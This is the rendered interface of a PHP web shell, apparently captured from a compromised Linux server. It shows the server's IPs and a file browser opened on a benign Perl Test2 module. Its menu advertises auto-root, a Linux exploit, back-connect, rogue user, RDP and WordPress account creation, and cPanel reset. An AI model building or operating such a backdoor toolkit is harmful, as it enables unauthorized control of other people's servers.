Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.189.170.65
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
share /
perl5 /
Test2 /
API /
InterceptResult /
[ HOME SHELL ]
Name
Size
Permission
Action
Event.pm
27.97
KB
-r--r--r--
Facet.pm
380
B
-r--r--r--
Hub.pm
967
B
-r--r--r--
Squasher.pm
3.59
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Facet.pm
package Test2::API::InterceptResult::Facet; use strict; use warnings; our $VERSION = '1.302190'; BEGIN { require Test2::EventFacet; our @ISA = ('Test2::EventFacet'); } our $AUTOLOAD; sub AUTOLOAD { my $self = shift; my $name = $AUTOLOAD; $name =~ s/^.*:://g; return undef unless exists $self->{$name}; return $self->{$name}; } sub DESTROY {} 1;
Close